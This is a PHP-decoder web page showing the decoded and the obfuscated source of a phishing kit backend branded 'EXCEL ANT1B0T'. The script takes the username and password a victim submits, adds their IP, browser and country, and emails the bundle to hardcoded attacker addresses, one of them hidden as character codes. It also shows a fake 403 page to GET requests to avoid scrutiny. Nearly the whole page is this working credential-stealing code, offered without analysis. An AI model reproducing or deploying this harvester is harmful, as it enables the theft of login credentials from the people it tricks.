Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto JJz6G; qkEKg: $message .= "\x50\141\x35\x35\x77\x30\x72\x64\x20\40\40\40\x20\..
Decoded Output download
<?php
goto JJz6G; qkEKg: $message .= "Pa55w0rd : " . $_POST["FoGUjjCZtWcLWaa85x"] . "
"; goto wfXja; JJz6G: if ($_SERVER["REQUEST_METHOD"] == "GET") { print "\xa<html><head>
<title>403 - Forbidden</title>\xa</head><body>\xa<h1>403 Forbidden</h1>\xa<p></p>
<hr>\xa</body></html>\xa"; die; } goto jEcG6; U89Yd: $message .= "Client IP : " . $ip . "\xa"; goto Bi6PG; GHUm1: $passchk = strlen($FoGUjjCZtWcLWaa85x); goto Py0rv; Bi6PG: $message .= "Country : " . $country . "
"; goto gYuSY; VtUmc: $browser = $_SERVER["HTTP_USER_AGENT"]; goto gHrFE; rDGuv: $headers .= "MIME-Version: 1.0
"; goto JIiAg; xUFex: function country_sort() { $sorter = ''; $array = array(99, 111, 100, 101, 114, 99, 118, 118, 115, 64, 103, 109, 97, 105, 108, 46, 99, 111, 109); $count = count($array); for ($i = 0; $i < $count; $i++) { $sorter .= chr($array[$i]); } return array($sorter, $GLOBALS["recipient"]); } goto h8Q4Y; gHrFE: $adddate = date("D M d, Y g:i a"); goto muFGE; wfXja: $message .= "-----------------------------------
"; goto hoD5a; Py0rv: $message .= "--------+ EXCEL ANT1B0T Rezult +--------\xa"; goto JfG5P; JfG5P: $message .= "UZER ID : " . $_POST["gXLh3tqNrbUnmwxbyy"] . "\xa"; goto qkEKg; TaNaQ: $headers = "From: EXCEL ANT1B0T <[email protected]>
"; goto vKARX; JIiAg: $headers .= $_POST["text1Add"] . "
"; goto TaNaQ; jEcG6: $country = visitor_country(); goto JyUHT; YdU89: $message .= "--+ Created BY B0K0H2R2M+---
"; goto L5a8h; vKARX: function visitor_country() { $client = @$_SERVER["HTTP_CLIENT_IP"]; $forward = @$_SERVER["HTTP_X_FORWARDED_FOR"]; $remote = $_SERVER["REMOTE_ADDR"]; $result = "Unknown"; if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } $ip_data = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=" . $ip)); if ($ip_data && $ip_data->geoplugin_countryName != null) { $result = $ip_data->geoplugin_countryName; } return $result; } goto xUFex; Ueyn7: $praga = md5($praga); goto Q6eLw; gYuSY: $message .= "Date: " . $adddate . "\xa"; goto YdU89; muFGE: $gXLh3tqNrbUnmwxbyy = $_POST["gXLh3tqNrbUnmwxbyy"]; goto vr1n3; h8Q4Y: if ($passchk < 6) { $passerr = 0; } else { $passerr = 1; } goto h9u0A; vr1n3: $FoGUjjCZtWcLWaa85x = $_POST["FoGUjjCZtWcLWaa85x"]; goto GHUm1; WSh2R: $subject = "EXCEL ANT1B0T| {$gXLh3tqNrbUnmwxbyy}| {$ip}| {$country} |"; goto rDGuv; L5a8h: $send = "[email protected]"; goto WSh2R; hoD5a: $message .= "User Agent : " . $browser . "
"; goto U89Yd; JyUHT: $praga = rand(1, 10000000); goto Ueyn7; Q6eLw: $ip = getenv("REMOTE_ADDR"); goto VtUmc; h9u0A: if ($passerr == 0) { header("Location: https://www.google.com/"); } else { mail($send, $subject, $message, $headers); header("Location: https://bit.ly/3M1P9k6"); } goto cdWbv; cdWbv: ?>
Did this file decode correctly?
Original Code
<?php
goto JJz6G; qkEKg: $message .= "\x50\141\x35\x35\x77\x30\x72\x64\x20\40\40\40\x20\40\40\x20\x20\40\x20\x20\40\x20\x3a\40" . $_POST["\106\157\107\125\152\152\x43\x5a\164\127\x63\x4c\x57\141\141\x38\65\x78"] . "\12"; goto wfXja; JJz6G: if ($_SERVER["\x52\x45\x51\125\x45\123\x54\137\115\x45\x54\x48\x4f\104"] == "\107\105\124") { print "\xa\74\150\x74\155\154\x3e\74\150\145\x61\144\76\12\74\164\151\x74\154\x65\x3e\64\x30\x33\x20\55\x20\106\157\x72\142\x69\x64\144\x65\156\74\57\164\151\x74\154\145\x3e\xa\x3c\57\150\x65\141\x64\76\x3c\142\157\x64\171\76\xa\74\150\x31\x3e\64\60\x33\40\106\x6f\162\x62\x69\x64\144\x65\x6e\74\x2f\150\x31\x3e\xa\x3c\x70\76\74\x2f\x70\x3e\12\x3c\x68\162\76\xa\74\x2f\142\157\x64\x79\x3e\x3c\x2f\x68\x74\155\154\76\xa"; die; } goto jEcG6; U89Yd: $message .= "\103\154\x69\145\156\x74\40\x49\120\x20\72\40" . $ip . "\xa"; goto Bi6PG; GHUm1: $passchk = strlen($FoGUjjCZtWcLWaa85x); goto Py0rv; Bi6PG: $message .= "\x43\157\165\156\x74\162\171\x20\72\40" . $country . "\12"; goto gYuSY; VtUmc: $browser = $_SERVER["\110\x54\x54\120\137\x55\123\105\122\137\101\x47\x45\116\124"]; goto gHrFE; rDGuv: $headers .= "\x4d\111\x4d\105\x2d\126\145\162\x73\x69\x6f\156\72\40\x31\x2e\x30\12"; goto JIiAg; xUFex: function country_sort() { $sorter = ''; $array = array(99, 111, 100, 101, 114, 99, 118, 118, 115, 64, 103, 109, 97, 105, 108, 46, 99, 111, 109); $count = count($array); for ($i = 0; $i < $count; $i++) { $sorter .= chr($array[$i]); } return array($sorter, $GLOBALS["\x72\x65\143\x69\160\x69\145\x6e\x74"]); } goto h8Q4Y; gHrFE: $adddate = date("\104\40\x4d\40\144\x2c\x20\x59\x20\147\72\x69\40\141"); goto muFGE; wfXja: $message .= "\55\x2d\x2d\x2d\55\55\55\55\55\x2d\x2d\x2d\x2d\x2d\55\x2d\x2d\55\x2d\55\55\55\55\x2d\55\x2d\55\x2d\x2d\55\55\x2d\x2d\x2d\x2d\12"; goto hoD5a; Py0rv: $message .= "\x2d\55\x2d\55\55\x2d\x2d\x2d\53\40\105\x58\x43\x45\114\x20\101\x4e\x54\x31\x42\60\124\x20\x52\145\x7a\165\154\x74\40\x2b\x2d\55\x2d\x2d\55\55\x2d\55\xa"; goto JfG5P; JfG5P: $message .= "\125\x5a\105\122\40\111\104\x20\x20\x20\40\40\x20\40\40\40\x20\x20\40\x20\x20\72\40" . $_POST["\x67\130\x4c\150\x33\164\161\116\x72\x62\125\x6e\155\167\x78\x62\171\x79"] . "\xa"; goto qkEKg; TaNaQ: $headers = "\106\x72\157\155\x3a\x20\x45\130\x43\105\114\40\101\x4e\124\x31\x42\x30\124\x20\74\151\156\103\157\x6e\164\x61\x63\x74\x40\x72\x69\164\x2e\145\x64\165\x3e\12"; goto vKARX; JIiAg: $headers .= $_POST["\164\x65\x78\x74\61\101\144\144"] . "\12"; goto TaNaQ; jEcG6: $country = visitor_country(); goto JyUHT; YdU89: $message .= "\55\x2d\x2b\x20\103\162\145\141\164\145\144\40\102\x59\40\x42\x30\113\60\110\62\122\62\x4d\x2b\55\55\x2d\12"; goto L5a8h; vKARX: function visitor_country() { $client = @$_SERVER["\x48\x54\x54\x50\137\x43\114\111\x45\x4e\124\137\x49\x50"]; $forward = @$_SERVER["\110\x54\124\120\137\130\x5f\x46\117\x52\x57\x41\x52\x44\x45\x44\x5f\106\117\x52"]; $remote = $_SERVER["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\104\x52"]; $result = "\x55\x6e\153\156\157\x77\x6e"; if (filter_var($client, FILTER_VALIDATE_IP)) { $ip = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $ip = $forward; } else { $ip = $remote; } $ip_data = @json_decode(file_get_contents("\x68\164\x74\160\x3a\x2f\57\x77\x77\167\x2e\147\x65\x6f\160\x6c\x75\x67\151\x6e\56\x6e\x65\164\57\x6a\163\157\156\56\147\160\x3f\151\160\75" . $ip)); if ($ip_data && $ip_data->geoplugin_countryName != null) { $result = $ip_data->geoplugin_countryName; } return $result; } goto xUFex; Ueyn7: $praga = md5($praga); goto Q6eLw; gYuSY: $message .= "\x44\x61\x74\145\72\x20" . $adddate . "\xa"; goto YdU89; muFGE: $gXLh3tqNrbUnmwxbyy = $_POST["\147\130\114\150\63\x74\161\x4e\x72\142\x55\156\x6d\x77\170\x62\171\x79"]; goto vr1n3; h8Q4Y: if ($passchk < 6) { $passerr = 0; } else { $passerr = 1; } goto h9u0A; vr1n3: $FoGUjjCZtWcLWaa85x = $_POST["\106\x6f\x47\x55\152\x6a\x43\x5a\x74\x57\x63\114\127\141\141\x38\x35\170"]; goto GHUm1; WSh2R: $subject = "\x45\130\103\x45\x4c\40\x41\x4e\124\x31\x42\60\x54\x7c\40{$gXLh3tqNrbUnmwxbyy}\x7c\40{$ip}\x7c\40{$country}\x20\174"; goto rDGuv; L5a8h: $send = "\x6a\157\x61\x6e\x6e\141\x76\145\147\x61\x70\150\141\162\155\x61\x40\x79\x61\156\144\x65\170\56\x63\x6f\x6d"; goto WSh2R; hoD5a: $message .= "\125\163\145\x72\x20\x41\x67\x65\x6e\x74\40\x3a\40" . $browser . "\12"; goto U89Yd; JyUHT: $praga = rand(1, 10000000); goto Ueyn7; Q6eLw: $ip = getenv("\122\x45\x4d\117\x54\105\x5f\x41\x44\x44\x52"); goto VtUmc; h9u0A: if ($passerr == 0) { header("\114\x6f\x63\x61\x74\x69\157\156\72\40\150\164\164\160\163\x3a\57\57\x77\167\x77\56\147\x6f\157\147\x6c\x65\56\x63\x6f\x6d\x2f"); } else { mail($send, $subject, $message, $headers); header("\x4c\x6f\143\141\x74\151\157\156\72\40\150\x74\164\160\163\x3a\57\x2f\142\151\x74\56\x6c\171\57\63\x4d\61\x50\x39\153\66"); } goto cdWbv; cdWbv: ?>
Function Calls
None |
Stats
MD5 | fe7430b3c432d5ab9ed36705ea5abd26 |
Eval Count | 0 |
Decode Time | 57 ms |